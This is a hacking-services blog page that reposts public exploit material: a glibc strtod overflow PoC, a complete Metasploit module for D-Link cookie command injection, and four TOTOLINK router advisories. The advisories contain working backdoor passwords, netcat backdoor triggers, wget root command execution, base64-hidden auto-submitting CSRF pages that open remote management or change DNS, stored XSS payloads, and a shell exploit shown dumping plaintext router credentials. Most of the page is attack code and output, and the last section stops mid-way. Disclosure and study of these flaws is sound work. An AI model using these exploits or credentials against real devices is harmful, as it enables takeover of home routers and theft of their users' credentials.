Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863141548

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
// source: https://www.securityfocus.com/bid/54982/info

GNU glibc is prone to multiple stack-based buffer-overflow vulnerabilities because it fails to perform adequate boundary checks on user-supplied data.

Local attackers can exploit these issues to run arbitrary code with privileges of the affected application. Failed exploit attempts can result in a denial-of-service condition. 

include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define EXPONENT "e-2147483649"
#define SIZE 214748364
int
main (void)
{
  char *p = malloc (1 + SIZE + sizeof (EXPONENT));
  if (p == NULL)
    {
      perror ("malloc");
      exit (EXIT_FAILURE);
    }
  p[0] = '1';
  memset (p + 1, '0', SIZE);
  memcpy (p + 1 + SIZE, EXPONENT, sizeof (EXPONENT));
  double d = strtod (p, NULL);
  printf ("%a\n", d);
  exit (EXIT_SUCCESS);
}
HireHackking 
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'D-Link Cookie Command Execution',
      'Description'    => %q{
        This module exploits an anonymous remote upload and code execution vulnerability on different
        D-Link devices. The vulnerability is a command injection in the cookie handling process of the
        lighttpd web server when handling specially crafted cookie values. This module has been
        successfully tested on D-Link DSP-W110A1_FW105B01 in emulated environment.
      },
      'Author'         =>
        [
          'Peter Adkins <peter.adkins[at]kernelpicnic.net>', # vulnerability discovery and initial PoC
          'Michael Messner <devnull[at]s3cur1ty.de>' # Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'Platform'       => 'linux',
      'References'     =>
        [
          ['URL', 'https://github.com/darkarnium/secpub/tree/master/D-Link/DSP-W110'] # blog post including PoC
        ],
      'DisclosureDate' => 'Jun 12 2015',
      'Payload'        =>
        {
          'DisableNops' => true
        },
      'Targets' =>
        [
          [ 'MIPS Little Endian',  # unknown if there are LE devices out there ... but in case we have a target
            {
              'Platform' => 'linux',
              'Arch'     => ARCH_MIPSLE
            }
          ],
          [ 'MIPS Big Endian',
            {
              'Platform' => 'linux',
              'Arch'     => ARCH_MIPSBE
            }
          ]
        ],
      'DefaultTarget'    => 1
      ))
  end

  def check
    begin
      res = send_request_cgi({
        'uri'    => '/',
        'method' => 'GET'
      })

      if res && res.headers["Server"] =~ /lighttpd\/1\.4\.34/
        return Exploit::CheckCode::Detected
      end
    rescue ::Rex::ConnectionError
      return Exploit::CheckCode::Unknown
    end

    Exploit::CheckCode::Unknown
  end

  def exploit
    print_status("#{peer} - Trying to access the device ...")

    unless check == Exploit::CheckCode::Detected
      fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable device")
    end

    print_status("#{peer} - Uploading stager ...")
    @counter = 1
    execute_cmdstager(
      :flavor  => :echo,
      :linemax => 95  # limited by our upload, larger payloads crash the web server
    )

    print_status("#{peer} - creating payload and executing it ...")

    (1 .. @counter).each do |act_file|
      # the http server blocks access to our files ... we copy it to a new one
      # the length of our command is restricted to 19 characters
      cmd = "cp /t*/#{act_file} /tmp/#{act_file+@counter}"
      execute_final_command(cmd)
      cmd = "chmod +x /tmp/#{act_file+@counter}"
      execute_final_command(cmd)
      cmd = "/tmp/#{act_file+@counter}"
      execute_final_command(cmd)
      cmd = "rm /tmp/#{act_file}"
      execute_final_command(cmd)
      cmd = "rm /tmp/#{act_file+@counter}"
      execute_final_command(cmd)
    end
  end

  def execute_command(cmd,opts)
    # upload our stager to a shell script
    # upload takes quite long because there is no response from the web server

    file_upload = "#!/bin/sh\n"
    file_upload << cmd << "\n"

    post_data = Rex::MIME::Message.new
    post_data.add_part(file_upload, nil, "binary", "form-data; name=\"#{rand_text_alpha(4)}\"; filename=\"#{@counter}\"")
    post_data.bound = "-#{rand_text_alpha(12)}--"
    file = post_data.to_s

    @counter = @counter + 1

    begin
      send_request_cgi({
        'method'        => 'POST',
        'uri'           => "/web_cgi.cgi",
        'vars_get' => {
          '&request' =>'UploadFile',
          'path' => '/tmp/'
        },
        'encode_params' => false,
        'ctype'         => "multipart/form-data; boundary=#{post_data.bound}",
        'data'          => file
      })
    rescue ::Rex::ConnectionError
      fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
    end

  end

  def execute_final_command(cmd)
    # very limited space - larger commands crash the webserver
    fail_with(Failure::Unknown, "#{peer} - Generated command for injection is too long") if cmd.length > 18
    begin
      send_request_cgi({
        'method'        => 'GET',
        'uri'           => "/",
        'cookie'        => "i=`#{cmd}`"
      }, 5)
    rescue ::Rex::ConnectionError
      fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
    end
  end
end
HireHackking 
## Advisory Information

Title: Backdoor credentials found in 4 TOTOLINK router models
Advisory URL: https://pierrekim.github.io/advisories/2015-totolink-0x03.txt
Blog URL: https://pierrekim.github.io/blog/2015-07-16-backdoor-credentials-found-in-4-TOTOLINK-products.html
Date published: 2015-07-16
Vendors contacted: None
Release mode: 0days, Released
CVE: no current CVE



## Product Description

TOTOLINK is a brother brand of ipTime which wins over 80% of SOHO
markets in South Korea.
TOTOLINK produces routers routers, wifi access points and network
devices. Their products are sold worldwide.



## Vulnerabilities Summary

Backdoor credentials are present in several TOTOLINK products.

It affects 4 TOTOLINK products (firmwares come from totolink.net and
from totolink.cn):

G150R-V1 : last firmware 1.0.0-B20150330
(TOTOLINK-G150R-V1.0.0-B20150330.1734.web)
G300R-V1 : last firmware 1.0.0-B20150330
(TOTOLINK-G300R-V1.0.0-B20150330.1816.web)
N150RH-V1 : last firmware 1.0.0-B20131219
(TOTOLINK-N150RH-V1.0.0-B20131219.1014.web)
N301RT-V1 : last firmware 1.0.0 (TOTOLINK N301RT_V1.0.0.web)

It allows an attacker in the LAN to connect to the device using telnet
with 2 different accounts: root and 'onlime_r' which gives with root
privileges.



## Details - G150R-V1 and G300R-V1

The init.d script executes these commands when the router starts:

[...]
cp /etc/passwd_orig /var/passwd
cp /etc/group_orig /var/group
telnetd&
[...]


The /etc/passwd_orig contains backdoor credentials:

root:$1$01OyWDBw$Hrxb2t.LtmiiJD49OBsCU/:0:0:root:/:/bin/sh
onlime_r:$1$01OyWDBw$Hrxb2t.LtmiiJD49OBsCU/:0:0:root:/:/bin/sh
nobody:x:0:0:nobody:/:/dev/null

The corresponding passwords are:

root:12345
onlime_r:12345


## Details - N150RH-V1 and N301RT

The init.d script executes these commands when the router starts:

[...]
#start telnetd
telnetd&
[...]

The binary /bin/sysconf executes these commands when the router starts:

system("cp /etc/passwd.org /var/passwd 2> /dev/null")


The /etc/passwd.org contains backdoor credentials:

root:$1$01OyWDBw$Hrxb2t.LtmiiJD49OBsCU/:0:0:root:/:/bin/sh
onlime_r:$1$01OyWDBw$Hrxb2t.LtmiiJD49OBsCU/:0:0:root:/:/bin/sh
nobody:x:0:0:nobody:/:/dev/null

The corresponding passwords are:

root:12345
onlime_r:12345



## Vendor Response

TOTOLINK was not contacted in regard of this case.



## Report Timeline

* Jun 25, 2015: Backdoor found by analysing TOTOLINK firmwares.
* Jun 26, 2015: working PoCs.
* Jul 16, 2015: A public advisory is sent to security mailing lists.



## Credit

These backdoor credentials were found Pierre Kim (@PierreKimSec).



## References

https://pierrekim.github.io/advisories/2015-totolink-0x03.txt



## Disclaimer

This advisory is licensed under a Creative Commons Attribution Non-Commercial
Share-Alike 3.0 License: http://creativecommons.org/licenses/by-nc-sa/3.0/
HireHackking 
## Advisory Information

Title: Backdoor and RCE found in 8 TOTOLINK router models
Advisory URL: https://pierrekim.github.io/advisories/2015-totolink-0x02.txt
Blog URL: https://pierrekim.github.io/blog/2015-07-16-backdoor-and-RCE-found-in-8-TOTOLINK-products.html
Date published: 2015-07-16
Vendors contacted: None
Release mode: 0days, Released
CVE: no current CVE



## Product Description

TOTOLINK is a brother brand of ipTime which wins over 80% of SOHO
markets in South Korea.
TOTOLINK produces routers routers, wifi access points and network
devices. Their products are sold worldwide.



## Vulnerabilities Summary

A backdoor is present in several TOTOLINK products.
This was confirmed by analysing the latest firmwares and by testing
the backdoor against live routers.

At least 8 TOTOLINK products are affected (firmwares come from
totolink.net and from totolink.cn):

  - A850R-V1 : until last firwmware TOTOLINK-A850R-V1.0.1-B20150707.1612.web
  - F1-V2 : until last firmware F1-V2.1.1-B20150708.1646.web
  - F2-V1 : until last firmware F2-V2.1.0-B20150320.1611.web
  - N150RT-V2 : until last firmware TOTOLINK-N150RT-V2.1.1-B20150708.1548.web
  - N151RT-V2 : until last firmware TOTOLINK-N151RT-V2.1.1-B20150708.1559.web
  - N300RH-V2 : until last firmware TOTOLINK-N300RH-V2.0.1-B20150708.1625.web
  - N300RH-V3 : until last firmware TOTOLINK-N300RH-V3.0.0-B20150331.0858.web
  - N300RT-V2 : until last firmware TOTOLINK-N300RT-V2.1.1-B20150708.1613.web


By sending a crafted request to the WAN IP, an attacker will open the
HTTP remote management interface on the Internet.
Then an attacker can use a Remote Code Execution in the HTTP remote
management interface by using the hidden /boafrm/formSysCmd form,
bypassing the authentication system.

We estimate there are =~ 50 000 routers affected by this backdoor.



## Details - backdoor

The init.d script executes the /bin/skt binary when the router starts:

    cat etc/init.d/rcS
    [...]
    # start web server
    boa
    skt&


skt is a small MIPS binary which is a client/server program. The arguments are:

    server: ./skt
    client: ./skt host cmd


The binary can be used in x86_64 machines using QEMU: sudo chroot .
./qemu-mips-static ./bin/skt

Using skt without argument will launch a TCP daemon on port 5555 in
every interface (including WAN), acting as an ECHO server.
Using skt with arguments will send a TCP packet containing the command
to the specified IP on port 5555.

The analysis of the binary running on the TOTOLINK devices (for more
details, read
https://pierrekim.github.io/blog/2015-07-XX-backdoor-in-TOTOLINK-products.html
) shows the server mode responds to 3 commands by silently executing
system() in the background:


    o By sending "hel,xasf" to the device, the device will execute:
iptables -I INPUT -p tcp --dport 80 -i eth1 -j ACCEPT

    This will open the HTTP remote management interface on port 80 in
the eth1 interface which is the WAN interface by default.


    o By sending "oki,xasf" to the device, the device will execute:
iptables -D INPUT -p tcp --dport 80 -i eth1 -j ACCEPT

    This will close the HTTP remote management interface.


    o By sending "bye,xasf" to the device, the device will do nothing


The iptables commands in the backdoor are hardcoded with "eth1".
Only devices using DHCP and static IP connections are affected because
the WAN IP is attached on the eth1 device.

It does not affect devices using PPPoE connections, because the WAN IP
is attached on the ppp device, as seen below:

totolink# ifconfig
ppp0      Link encap:Point-to-Point Protocol
          inet addr:X.X.X.X  P-t-P:X.X.X.X  Mask:255.255.255.255
          UP POINTOPOINT RUNNING NOARP MULTICAST  MTU:1438  Metric:1
          RX packets:17308398 errors:0 dropped:0 overruns:0 frame:0
          TX packets:2605290 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:64
          RX bytes:2803138455 (2.6 GiB)  TX bytes:277402492 (264.5 MiB)



An attacker can use these simple netcat commands to test the backdoor:

To open the HTTP remote management interface on the Internet:

    echo -ne "hel,xasf" | nc <ip> 5555

To close the HTTP remote management interface on the Internet:

    echo -ne "oki,xasf" | nc <ip> 5555

To detect a vulnerable router:

    echo -ne "GET / HTTP/1.1" | nc <ip> 5555

    if you see "GET / HTTP/1.1" in the answer, you likely detected a
vulnerable router.


## Details - RCE in the management interface

A hidden form in the latest firmware allows an attacker to execute
commands as root by sending a HTTP request:


    POST /boafrm/formSysCmd HTTP/1.1

    sysCmd=<cmd>&apply=Apply&msg=


An attacker can use wget to execute commands in the remote device:

    wget --post-data='sysCmd=<cmd>&apply=Apply&msg='
http://ip//boafrm/formSysCmd


For instance, sending this HTTP request to the management interface
will reboot the device:


    POST /boafrm/formSysCmd HTTP/1.1

    sysCmd=reboot&apply=Apply&msg=

This wget command will do the same job:

    wget --post-data='sysCmd=reboot&apply=Apply&msg='
http://ip//boafrm/formSysCmd



## Vendor Response

TOTOLINK was not contacted in regard of this case.



## Report Timeline

* Jun 25, 2015: Backdoor found by analysing TOTOLINK firmwares.
* Jun 26, 2015: Working PoCs with RCE.
* Jul 13, 2015: Updated firmwares confirmed vulnerable.
* Jul 16, 2015: A public advisory is sent to security mailing lists.



## Credit

These vulnerabilities were found by Alexandre Torres and Pierre Kim
(@PierreKimSec).



## References

https://pierrekim.github.io/advisories/2015-totolink-0x02.txt
https://pierrekim.github.io/blog/2015-07-16-backdoor-and-RCE-found-in-8-TOTOLINK-products.html



## Disclaimer

This advisory is licensed under a Creative Commons Attribution Non-Commercial
Share-Alike 3.0 License: http://creativecommons.org/licenses/by-nc-sa/3.0/
HireHackking 
## Advisory Information

Title: 4 TOTOLINK router models vulnerable to CSRF and XSS attacks
Advisory URL: https://pierrekim.github.io/advisories/2015-totolink-0x01.txt
Blog URL: http://pierrekim.github.io/blog/2015-07-16-4-TOTOLINK-products-vulnerable-to-CSRF-and-XSS-attacks.html
Date published: 2015-07-16
Vendors contacted: None
Release mode: Released, 0day
CVE: no current CVE



## Product Description

TOTOLINK is a brother brand of ipTime which wins over 80% of SOHO
markets in South Korea.
TOTOLINK produces routers routers, wifi access points and network
devices. Their products are sold worldwide.



## Vulnerability Summary

TOTOLINK iPuppy, iPuppy3, N100RE and N200RE are wireless LAN routers.
Their current firmwares with default configuration are
vulnerable to CSRF-attacks and XSS attacks.
Since, the anti-CSRF protection is based on a static HTTP referrer
(RFC 1945), an attacker can take over
most of the configuration and settings using anyone inside the LAN of
the router. Owners are urged to
contact TOTOLINK, and activate authentication on this product
(disabled by default).

It affects (firmware come from totolink.net and from totolink.cn):

TOTOLINK iPuppy : firmware 1.2.1 (TOTOLINK iPuppy__V1.2.1.update)
TOTOLINK iPuppy3 : firmware 1.0.2 (TOTOLINK iPuppy3_V1.0.2.update)
TOTOLINK N100RE-V1 : firmware V1.1-B20140723-2-432-EN
(TOTOLINK-N100RE-IP04216-RT5350-SPI-1M8M-V1.1-B20140723-2-432-EN.update)
TOTOLINK N200RE : firmware V1.4-B20140724-2-457-EN
(TOTOLINK-N200RE-IP04220-MT7620-SPI-1M8M-V1.4-B20140724-2-457-EN.update)



## Details - CSRF

The HTTP interface allows to edit the configuration. This interface is
vulnerable to CSRF.

Configuration and settings can be modified with CSRF attacks:
Activate the remote control management
Change the DNS configuration
Update the firmware
Change the Wifi Configuration
Create TCP redirections to the LAN
and more...


Example of forms exploiting the CSRF:


o Activating the remote control management on port 31337/tcp listening
on the WAN interface.

<html>
<head>
<script>
function s() {
document.f.submit();
}
</script>
</head>
<body onload="s()">
<form id="f" name="f" method="POST" action="http://192.168.1.1/do_cmd.htm">
<input type="hidden" name="CMD" value="SYS">
<input type="hidden" name="GO" value="firewallconf_accesslist.html">
<input type="hidden" name="nowait" value="1">
<input type="hidden" name="SET0" value="17367296=31337">
<input type="hidden" name="SET1" value="17236224=1">
</form>
</body>
</html>


o Changing the DNS configuration to 0.2.0.7 and 1.2.0.1:

<html>
<head>
<script>
function s() {
document.f.submit();
}
</script>
</head>
<body onload="s()">
<form id="f" name="f" method="POST" action="http://192.168.1.1/do_cmd.htm">
<input type="hidden" name="CMD" value="WAN">
<input type="hidden" name="GO" value="netconf_wansetup.html">
<input type="hidden" name="SET0" value="50397440=2">
<input type="hidden" name="SET1" value="50856960=64-E5-99-AA-AA-AA">
<input type="hidden" name="SET2" value="235077888=1">
<input type="hidden" name="SET3" value="235012865=0.2.0.7">
<input type="hidden" name="SET4" value="235012866=1.2.0.1">
<input type="hidden" name="SET5" value="51118336=0">
<input type="hidden" name="SET6" value="51839232=1">
<input type="hidden" name="SET7" value="51511552=1500">
<input type="hidden" name="SET8" value="117834240=">
<input type="hidden" name="SET9" value="117703168=">
<input type="hidden" name="SET10" value="117637376=1492">
<input type="hidden" name="SET11" value="51446016=1500">
<input type="hidden" name="SET12" value="50463488=192.168.1.1">
<input type="hidden" name="SET13" value="50529024=255.255.255.0">
<input type="hidden" name="SET14" value="50594560=192.168.1.254">
</form>
</body>
</html>


The variable GO is an open redirect. Any URL like
http://www.google.com/ for instance can be used.
The variable GO is also vulnerable to XSS. It's out of scope in this advisory.


To bypass the protection (which checks the refer), you can, for
example, base64 the form and include
it in the webpage.
The refer will be empty and the CSRF will be accepted by the device:



o activate_admin_wan_csrf_bypass.html:

<html>
<head>
<meta http-equiv="Refresh"
content="1;url=data:text/html;charset=utf8;base64,PGh0bWw+CjxoZWFkPgo8c2NyaXB0PgpmdW5jdGlvbiBzKCkgewogIGRvY3VtZW50LmYuc3VibWl0KCk7Cn0KPC9zY3JpcHQ+CjwvaGVhZD4KPGJvZHkgb25sb2FkPSJzKCkiPgo8Zm9ybSBpZD0iZiIgbmFtZT0iZiIgbWV0aG9kPSJQT1NUIiBhY3Rpb249Imh0dHA6Ly8xOTIuMTY4LjEuMS9kb19jbWQuaHRtIj4KPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iQ01EIiB2YWx1ZT0iU1lTIj4KPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iR08iIHZhbHVlPSJmaXJld2FsbGNvbmZfYWNjZXNzbGlzdC5odG1sIj4KPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0ibm93YWl0IiB2YWx1ZT0iMSI+CjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9IlNFVDAiIHZhbHVlPSIxNzM2NzI5Nj0zMTMzNyI+CjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9IlNFVDEiIHZhbHVlPSIxNzIzNjIyND0xIj4KPC9mb3JtPgo8L2JvZHk+CjwvaHRtbD4K">
</head>
<body>
</body>
</html>


Visiting activate_admin_wan_csrf_bypass.html in a remote location will activate
the remote management interface on port 31337/TCP.

You can test it through
http://pierrekim.github.io/advisories/2015-totolink-0x01-PoC-change_dns_csrf_bypass.html



o change_dns_csrf_bypass.html:

<html>
<head>
<meta http-equiv="Refresh"
content="1;url=data:text/html;charset=utf8;base64,PGh0bWw+CjxoZWFkPgo8c2NyaXB0PgpmdW5jdGlvbiBzKCkgewogIGRvY3VtZW50LmYuc3VibWl0KCk7Cn0KPC9zY3JpcHQ+CjwvaGVhZD4KPGJvZHkgb25sb2FkPSJzKCkiPgo8Zm9ybSBpZD0iZiIgbmFtZT0iZiIgbWV0aG9kPSJQT1NUIiBhY3Rpb249Imh0dHA6Ly8xOTIuMTY4LjEuMS9kb19jbWQuaHRtIj4KPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iQ01EIiB2YWx1ZT0iV0FOIj4KPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iR08iIHZhbHVlPSJuZXRjb25mX3dhbnNldHVwLmh0bWwiPgo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJTRVQwIiB2YWx1ZT0iNTAzOTc0NDA9MiI+CjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9IlNFVDEiIHZhbHVlPSI1MDg1Njk2MD02NC1FNS05OS1BQS1BQS1BQSI+CjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9IlNFVDIiIHZhbHVlPSIyMzUwNzc4ODg9MSI+CjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9IlNFVDMiIHZhbHVlPSIyMzUwMTI4NjU9MC4yLjAuNyI+CjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9IlNFVDQiIHZhbHVlPSIyMzUwMTI4NjY9MS4yLjAuMSI+CjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9IlNFVDUiIHZhbHVlPSI1MTExODMzNj0wIj4KPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iU0VUNiIgdmFsdWU9IjUxODM5MjMyPTEiPgo8aW5wdXQgdHlwZT0iaGlkZGVu
 IiBuYW1lPSJTRVQ3IiB2YWx1ZT0iNTE1MTE1NTI9MTUwMCI+CjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9IlNFVDgiIHZhbHVlPSIxMTc4MzQyNDA9Ij4KPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iU0VUOSIgdmFsdWU9IjExNzcwMzE2OD0iPgo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJTRVQxMCIgdmFsdWU9IjExNzYzNzM3Nj0xNDkyIj4KPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iU0VUMTEiIHZhbHVlPSI1MTQ0NjAxNj0xNTAwIj4KPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iU0VUMTIiIHZhbHVlPSI1MDQ2MzQ4OD0xOTIuMTY4LjEuMSI+CjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9IlNFVDEzIiB2YWx1ZT0iNTA1MjkwMjQ9MjU1LjI1NS4yNTUuMCI+CjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9IlNFVDE0IiB2YWx1ZT0iNTA1OTQ1NjA9MTkyLjE2OC4xLjI1NCI+CjwvZm9ybT4KPC9ib2R5Pgo8L2h0bWw+Cg==">
</head>
<body>
</body>
</html>


Visiting activate_admin_wan_csrf_bypass.html in a remote location will
change the DNS servers
provided by the TOTOLINK device in the LAN.

You can test it through
http://pierrekim.github.io/advisories/2015-totolink-0x01-PoC-activate_admin_wan_csrf_bypass.html



## Details - stored XSS and fun

There is a stored XSS, which can be injected using UPNP from the LAN,
without authentication:

upnp> host send 0 WANConnectionDevice WANIPConnection AddPortMapping

Required argument:
Argument Name:  NewPortMappingDescription
Data Type:      string
Allowed Values: []
Set NewPortMappingDescription value to: <script>alert("XSS");</script>

Required argument:
Argument Name:  NewLeaseDuration
Data Type:      ui4
Allowed Values: []
Set NewLeaseDuration value to: 0

Required argument:
Argument Name:  NewInternalClient
Data Type:      string
Allowed Values: []
Set NewInternalClient value to: <script>alert("XSS");</script>

Required argument:
Argument Name:  NewEnabled
Data Type:      boolean
Allowed Values: []
Set NewEnabled value to: 1

Required argument:
Argument Name:  NewExternalPort
Data Type:      ui2
Allowed Values: []
Set NewExternalPort value to: 80

Required argument:
Argument Name:  NewRemoteHost
Data Type:      string
Allowed Values: []
Set NewRemoteHost value to: <script>alert("XSS");</script>

Required argument:
Argument Name:  NewProtocol
Data Type:      string
Allowed Values: ['TCP', 'UDP']
Set NewProtocol value to: TCP

Required argument:
Argument Name:  NewInternalPort
Data Type:      ui2
Allowed Values: []
Set NewInternalPort value to: 80


upnp>


The UPNP webpage in the administration area
(http://192.168.0.1/popup_upnp_portmap.html) will show:

[...]
<tr>
<td class=item_td>TCP</td>
<td class=item_td>21331</td>
<td class=item_td><script>alert("XSS")<script>alert("XSS");</script>:28777</td>
<td class=item_td><script>alert("XSS");</script></td>
</tr>
[...]


- From my research, there are some bits overflapping with others,
resulting in showing funny ports
and truncating input data. A remote DoS against the upnpd process
seems to be easily done.

Gaining Remote Code Execution by UPNP exploitation is again left as a
exercise for the reader.



## Vendor Response

Due to "un-ethical code" found in TOTOLINK products (= backdoors found
in new TOTOLINK devices), TOTOLINK was not contacted in regard of this
case.



## Report Timeline

* Apr 20, 2015: Vulnerabilities found by Pierre Kim in ipTIME devices.
* Jun 20, 2015: Vulnerabilities confirmed with reliable PoCs.
* Jun 25, 2015: Vulnerabilities found in TOTOLINK products by looking
for similar ipTIME products.
* Jul 16, 2015: A public advisory is sent to security mailing lists.



## Credit

These vulnerabilities were found by Pierre Kim (@PierreKimSec).



## Greetings

Big thanks to Alexandre Torres.



## References

https://pierrekim.github.io/advisories/2015-totolink-0x01.txt



## Disclaimer

This advisory is licensed under a Creative Commons Attribution Non-Commercial
Share-Alike 3.0 License: http://creativecommons.org/licenses/by-nc-sa/3.0/
HireHackking 
## Advisory Information

Title: 15 TOTOLINK router models vulnerable to multiple RCEs
Advisory URL: https://pierrekim.github.io/advisories/2015-totolink-0x00.txt
Blog URL: https://pierrekim.github.io/blog/2015-07-16-15-TOTOLINK-products-vulnerable-to-multiple-RCEs.html
Date published: 2015-07-16
Vendors contacted: None
Release mode: 0days, Released
CVE: no current CVE



## Product Description

TOTOLINK is a brother brand of ipTime which wins over 80% of SOHO
markets in South Korea.
TOTOLINK produces routers routers, wifi access points and network
devices. Their products are sold worldwide.



## Vulnerabilities Summary

The first vulnerability allows to bypass the admin authentication and
to get a direct RCE from the LAN side with a single HTTP request.

The second vulnerability allows to bypass the admin authentication and
to get a direct RCE from the LAN side with a single DHCP request.

There are direct RCEs against the routers which give a complete root
access to the embedded Linux from the LAN side.

The two RCEs affect 13 TOTOLINK products from 2009-era firmwares to
the latest firmwares with the default configuration:

- TOTOLINK A1004 : until last firmware (9.34 - za1004_en_9_34.bin)
- TOTOLINK A5004NS : until last firmware (9.38 - za5004s_en_9_38.bin)
- TOTOLINK EX300 : until last firmware (8.68 - TOTOLINK EX300_8_68.bin
- totolink.net)
- TOTOLINK EX300 : until last firmware (9.36 -
ex300_ch_9_36.bin.5357c0 - totolink.cn)
- TOTOLINK N150RB : until last firmware (9.08 - zn150rb_en_9_08.bin.5357c0)
- TOTOLINK N300RB : until last firmware (9.26 - zn300rb_en_9_26.bin)
- TOTOLINK N300RG : until last firmware (8.70 - TOTOLINK N300RG_8_70.bin)
- TOTOLINK N500RDG : until last firmware (8.42 - TOTOLINK N500RDG_en_8_42.bin)
- TOTOLINK N600RD : until last firmware (8.64 - TOTOLINK N600RD_en_8_64.bin)
- TOTOLINK N302R Plus V1 : until the last firmware 8.82 (TOTOLINK
N302R Plus V1_en_8_82.bin)
- TOTOLINK N302R Plus V2 : until the last firmware 9.08 (TOTOLINK
N302R Plus V2_en_9_08.bin)
- TOTOLINK A3004NS (no firmware available in totolinkusa.com but
ipTIME's A3004NS model was vulnerable to the 2 RCEs)
- TOTOLINK EX150 : until the last firmware (8.82 - ex150_ch_8_82.bin.5357c0)


The DHCP RCE also affects 2 TOTOLINK products from 2009-era firmwares
to the latest firmwares with the default configuration:

- TOTOLINK A2004NS : until last firmware (9.60 - za2004s_en_9_60.bin)
- TOTOLINK EX750 : until last firmware (9.60 - ex750_en_9_60.bin)


Firmwares come from totolink.net and from totolink.cn.

- - From my tests, it is possible to use these vulnerabilities to
overwrite the firmware with a custom (backdoored) firmware.

Concerning the high CVSS score (10/10) of the vulnerabilities and the
longevity of this vulnerability (6+ year old),
the TOTOLINK users are urged to contact TOTOLINK.



## Details - RCE with a single HTTP request

The HTTP server allows the attacker to execute some CGI files.

Many of them are vulnerable to a command inclusion which allows to
execute commands with the http daemon user rights (root).


Exploit code:

$ cat totolink.carnage
#!/bin/sh
if [ ! $1 ]; then
echo "Usage:"
echo $0 ip command
exit 1
fi
wget -qO- --post-data="echo 'Content-type:
text/plain';echo;echo;PATH=$PATH:/sbin $2 $3 $4" http://$1/cgi-bin/sh


The exploits have been written in HTML/JavaScript, in form of CSRF
attacks, allowing people to test their systems in live using their
browsers:
http://pierrekim.github.io/advisories/


o Listing of the filesystem

HTML/JS exploits:

http://pierrekim.github.io/advisories/2015-totolink-0x00-PoC-listing.of.the.filesystem.html

Using CLI:

root@kali:~/totolink# ./totolink.carnage 192.168.1.1 ls | head
ash
auth
busybox
cat
chmod
cp
d.cgi
date
echo
false
root@kali:~/totolink#


o How to retrieve the credentials ? (see login and password at the end
of the text file)

HTML/JS exploits:

http://pierrekim.github.io/advisories/2015-totolink-0x00-PoC-dump.configuration.including.credentials.html

Using CLI:

kali# ./totolink.carnage 192.168.1.1 cat /tmp/etc/iconfig.cfg
wantype.wan1=dynamic
dhblock.eth1=0
ppp_mtu=1454
fakedns=0
upnp=1
ppp_mtu=1454
timeserver=time.windows.com,gmt22,1,480,0
wan_ifname=eth1
auto_dns=1
dhcp_auto_detect=0
wireless_ifmode+wlan0=wlan0,0
dhcpd=0
lan_ip=192.168.1.1
lan_netmask=255.255.255.0
dhcpd_conf=br0,192.168.1.2,192.168.1.253,192.168.1.1,255.255.255.0
dhcpd_dns=164.124.101.2,168.126.63.2
dhcpd_opt=7200,30,200,
dhcpd_configfile=/etc/udhcpd.conf
dhcpd_lease_file=/etc/udhcpd.leases
dhcpd_static_lease_file=/etc/udhcpd.static
use_local_gateway=1
login=admin
password=admin

Login and password are stored in plaintext, which is a very bad
security practice.


o Current running process:

HTML/JS exploits:

http://pierrekim.github.io/advisories/2015-totolink-0x00-PoC-current.process.html

Using CLI:

kali# ./totolink.carnage 192.168.1.1 ps -auxww


o Getting the kernel memory:

HTML/JS exploits:

http://pierrekim.github.io/advisories/2015-totolink-0x00-PoC-getting.kernel.memory.html

Using CLI:

kali# ./totolink.carnage 192.168.1.1 cat /proc/kcore


o Default firewall rules:

HTML/JS exploits:

http://pierrekim.github.io/advisories/2015-totolink-0x00-PoC-default.firewall.rules.html

Using CLI:

kali# ./iptime.carnage.l2.v9.52 192.168.1.1 iptables -nL


o Opening the management interface on the WAN:

HTML/JS exploits:

http://pierrekim.github.io/advisories/2015-totolink-0x00-PoC-opening.the.firewall.html


o Reboot the device:

HTML/JS exploits:

http://pierrekim.github.io/advisories/2015-totolink-0x00-PoC-reboot.html


o Brick the device:

HTML/JS exploits:

http://pierrekim.github.io/advisories/2015-totolink-0x00-PoC-bricking.the.device.html


An attacker can use the /usr/bin/wget binary located in the file
system of the remote device to plant a backdoor and then execute it as
root.

By the way, d.cgi in /bin/ is an intentional backdoor.



## Details - RCE with a single DHCP request

This vulnerability is the exact inverse of CVE-2011-0997. The DHCPD
server in TOTOLINK devices allows remote attackers to execute
arbitrary commands
via shell metacharacters in the host-name field.

